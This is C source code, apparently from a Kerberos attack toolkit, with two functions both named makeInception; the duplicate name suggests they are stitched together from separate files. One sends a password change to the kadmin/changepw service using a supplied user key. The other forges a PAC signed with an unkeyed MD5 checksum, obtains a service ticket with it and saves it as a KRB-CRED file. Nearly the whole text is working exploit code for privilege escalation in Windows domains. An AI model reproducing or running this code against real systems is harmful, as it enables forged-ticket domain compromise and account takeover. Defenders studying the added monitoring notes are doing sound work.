/**
 * Drives a Kerberos password-change (kadmin/changepw) exchange: an AS
 * exchange with the KDC, then an AP-REQ + KRB-PRIV carrying the new
 * password to the kadmin service on the same host.
 *
 * Flow (each stage runs only if the previous one succeeded):
 *   1. AS-REQ for "kadmin"/"changepw" as user@domain, built with `key`;
 *      the AS-REP is decoded with `key` to recover the reply part (and
 *      with it the session key).
 *   2. AP-REQ built from the returned ticket and that session key; the
 *      builder also hands back the authenticator subkey `authKey` and the
 *      sequence number `seq`, both consumed by the next step.
 *   3. KRB-PRIV wrapping `newpassword` under `authKey`, sent with the
 *      AP-REQ to kdc:kadminPort over a second socket.
 *   4. The KRB-PRIV reply is decoded with `authKey` and its user_data is
 *      passed to retFromKadmin() for reporting.
 *
 * @param user         client principal whose password is being set
 * @param domain       Kerberos realm
 * @param newpassword  new password, sent as raw bytes without the NUL
 * @param key          long-term key of `user`, used for the AS exchange
 * @param kdc          KDC host; also used for the kadmin connection
 * @param port         KDC port (AS exchange)
 * @param kadminPort   port of the kadmin/changepw service
 *
 * Returns nothing. A failing stage ends the chain after the progress lines
 * already printed; nothing is printed for the failure itself. Every buffer,
 * PDU and socket acquired so far is released on the way out, in reverse
 * acquisition order.
 *
 * Monitoring footprint (from the code alone): an AS-REQ naming
 * kadmin/changepw followed by a connection from the same client to
 * `kadminPort` on the same KDC host.
 */
void makeInception(PCSTR user, PCSTR domain, PCSTR newpassword, EncryptionKey *key, PCSTR kdc, WORD port, WORD kadminPort)
{
	SOCKET connectSocket, connectSocketAdmin;	// KDC connection, then kadmin connection
	OssBuf AsReq, ApReq, KrbPrivReq;	// encoded request buffers (freed via ossFreeBuf)
	KDC_REP *AsRep;
	AP_REP *ApRep;
	KRB_PRIV *KrbPriv;
	EncKDCRepPart *encAsRepPart;
	_octet1 password;	// borrowed view of newpassword, not owned
	EncryptionKey authKey;	// authenticator subkey produced by build_ApReq, used for KRB-PRIV
	UInt32 seq;	// sequence number threaded from AP-REQ into KRB-PRIV
	EncKrbPrivPart *encKrbPrivPart;

	// NOTE(review): strlen() returns size_t; confirm _octet1.length is wide
	// enough — the assignment narrows silently if it is not.
	password.length = strlen(newpassword);
	// Cast drops const; assumes the builders only read through this pointer — confirm.
	password.value = (unsigned char *) newpassword;

	if(kull_m_sock_initSocket(kdc, port, &connectSocket))
	{
		kprintf(" [level 1] Reality       (AS-REQ)\n");
		// AS-REQ for the kadmin/changepw service principal.
		if(kull_m_kerberos_asn1_helper_build_KdcReq(user, domain, key, "kadmin", "changepw", NULL, FALSE, NULL, NULL, &AsReq))
		{
			if(kull_m_kerberos_helper_net_callKdcOssBuf(&connectSocket, &AsReq, (LPVOID *) &AsRep, AS_REP_PDU))
			{
				// Decode the encrypted part of the AS-REP with the client key.
				if(kull_m_kerberos_asn1_helper_build_EncKDCRepPart_from_Rep(AsRep, &encAsRepPart, key, EncASRepPart_PDU))
				{
					kprintf(" [level 2] Van Chase     (AP-REQ)\n");
					// Outputs authKey and seq, both needed by the KRB-PRIV below.
					if(kull_m_kerberos_asn1_helper_build_ApReq(&ApReq, user, domain, &AsRep->ticket, &encAsRepPart->key, KRB_KEY_USAGE_AP_REQ_AUTHENTICATOR, &authKey, &seq))
					{
						kprintf(" [level 3] The Hotel     (KRB-PRIV - REQ)\n");
						// Third argument is a fixed literal; its meaning is not visible from here.
						if(kull_m_kerberos_asn1_helper_build_KrbPriv(&password, &authKey, "wtf", &KrbPrivReq, &seq))
						{
							// Separate socket for the kadmin service.
							if(kull_m_sock_initSocket(kdc, kadminPort, &connectSocketAdmin))
							{
								if(kull_m_kerberos_helper_net_callKadminOssBuf(&connectSocketAdmin, &ApReq, &KrbPrivReq, &ApRep, &KrbPriv))
								{
									kprintf(" [level 4] Snow Fortress (KRB-PRIV - REP)\n");
									if(kull_m_kerberos_asn1_helper_build_EncKrbPrivPart_from_Priv(KrbPriv, &encKrbPrivPart, &authKey))
									{
										kprintf(" [level 5] Limbo ! : ");
										// No newline above: retFromKadmin() presumably completes the line with the result.
										retFromKadmin(&encKrbPrivPart->user_data);
										kull_m_kerberos_asn1_helper_ossFreePDU(EncKrbPrivPart_PDU, encKrbPrivPart);
									}
									kull_m_kerberos_asn1_helper_ossFreePDU(KRB_PRIV_PDU, KrbPriv);
									kull_m_kerberos_asn1_helper_ossFreePDU(AP_REP_PDU, ApRep);
								}
								kull_m_sock_termSocket(&connectSocketAdmin);
							}
							kull_m_kerberos_asn1_helper_ossFreeBuf(KrbPrivReq.value);
						}
						kull_m_kerberos_asn1_helper_ossFreeBuf(ApReq.value);
					}
					kull_m_kerberos_asn1_helper_ossFreePDU(EncASRepPart_PDU, encAsRepPart);
				}
				kull_m_kerberos_asn1_helper_ossFreePDU(AS_REP_PDU, AsRep);
			}
			kull_m_kerberos_asn1_helper_ossFreeBuf(AsReq.value);
		}
		kull_m_sock_termSocket(&connectSocket);
	}
}
/**
 * Requests a service ticket for `service`/`target` as `user` while supplying
 * a locally built PAC, and saves the result to `filename` as a KRB-CRED.
 *
 * Flow (each stage runs only if the previous one succeeded):
 *   1. AS-REQ for user@domain built with `key`; the AS-REP is decoded with
 *      `key` to recover the reply part (session key and authtime).
 *   2. giveMePac() builds a PAC from `sid`/`rid`, stamped with the AS-REP
 *      authtime and checksummed with KERB_CHECKSUM_MD5.
 *   3. TGS-REQ for `service`/`target`, built with the AS session key, the
 *      returned ticket and the PAC from step 2, over the same KDC socket.
 *   4. The TGS-REP is decoded with the AS session key and written together
 *      with the ticket to `filename`.
 *
 * @param user      client principal for the AS exchange
 * @param domain    Kerberos realm
 * @param sid       SID handed to giveMePac() (presumably the domain SID)
 * @param rid       RID handed to giveMePac()
 * @param target    second name component of the requested service principal
 * @param service   first name component of the requested service principal
 * @param key       long-term key of `user`
 * @param kdc       KDC host
 * @param port      KDC port
 * @param filename  output path for the KRB-CRED
 *
 * Returns nothing. A failing stage ends the chain after the progress lines
 * already printed. PDUs, request buffers, the PAC and the socket are
 * released in reverse acquisition order on the way out.
 *
 * NOTE(review): KERB_CHECKSUM_MD5 is an unkeyed checksum type; whether a KDC
 * accepts a PAC signed that way depends on its patch level, which is not
 * visible here. From a monitoring standpoint the footprint is an AS-REQ and
 * a TGS-REQ for `service`/`target` arriving over the same connection.
 */
void makeInception(PCSTR user, PCSTR domain, PSID sid, DWORD rid, PCSTR target, PCSTR service, EncryptionKey *key, PCSTR kdc, WORD port, PCSTR filename)
{
	SOCKET connectSocket;	// single KDC connection reused for AS and TGS exchanges
	OssBuf AsReq, TgsReq;	// encoded request buffers (freed via ossFreeBuf)
	KDC_REP *AsRep, *TgsRep;
	EncKDCRepPart *encAsRepPart, *encTgsRepPart;
	_octet1 pac;	// pac.value is LocalFree'd below, so giveMePac() is expected to LocalAlloc it — confirm

	if(kull_m_sock_initSocket(kdc, port, &connectSocket))
	{
		kprintf(" [level   1] Reality       (AS-REQ)\n");
		// Plain AS-REQ: no service name, ticket or extra data supplied here.
		if(kull_m_kerberos_asn1_helper_build_KdcReq(user, domain, key, NULL, NULL, FALSE, NULL, NULL, &AsReq))
		{
			if(kull_m_kerberos_helper_net_callKdcOssBuf(&connectSocket, &AsReq, (LPVOID *) &AsRep, AS_REP_PDU))
			{
				// Decode the encrypted part of the AS-REP with the client key.
				if(kull_m_kerberos_asn1_helper_build_EncKDCRepPart_from_Rep(AsRep, &encAsRepPart, key, EncASRepPart_PDU))
				{
					kprintf(" [level   2] Van Chase     (PAC TIME)\n");
					// The AS-REP authtime is reused so the PAC's times line up with the ticket — presumably.
					if(giveMePac(user, sid, rid, &encAsRepPart->authtime, KERB_CHECKSUM_MD5, NULL, &pac))
					{
						kprintf(" [level   3] The Hotel     (TGS-REQ)\n");
						// TGS-REQ keyed with the AS session key; carries the AS ticket and the PAC.
						if(kull_m_kerberos_asn1_helper_build_KdcReq(user, domain, &encAsRepPart->key, service, target, FALSE, &AsRep->ticket, &pac, &TgsReq))
						{
							if(kull_m_kerberos_helper_net_callKdcOssBuf(&connectSocket, &TgsReq, (LPVOID *) &TgsRep, TGS_REP_PDU))
							{
								// Decode the TGS-REP with the same AS session key.
								if(kull_m_kerberos_asn1_helper_build_EncKDCRepPart_from_Rep(TgsRep, &encTgsRepPart, &encAsRepPart->key, EncTGSRepPart_PDU))
								{
									kprintf(" [level 4-5] Limbo         (KRB-CRED)\n");
									// Return value is not checked; a failed save is not reported here.
									kull_m_kerberos_helper_util_SaveRepAsKrbCred(TgsRep, encTgsRepPart, filename);
									kull_m_kerberos_asn1_helper_ossFreePDU(EncTGSRepPart_PDU, encTgsRepPart);
								}
								kull_m_kerberos_asn1_helper_ossFreePDU(TGS_REP_PDU, TgsRep);
							}
							kull_m_kerberos_asn1_helper_ossFreeBuf(TgsReq.value);
						}
						LocalFree(pac.value);
					}
					kull_m_kerberos_asn1_helper_ossFreePDU(EncASRepPart_PDU, encAsRepPart);
				}
				kull_m_kerberos_asn1_helper_ossFreePDU(AS_REP_PDU, AsRep);
			}
			kull_m_kerberos_asn1_helper_ossFreeBuf(AsReq.value);
		}
		kull_m_sock_termSocket(&connectSocket);
	}
}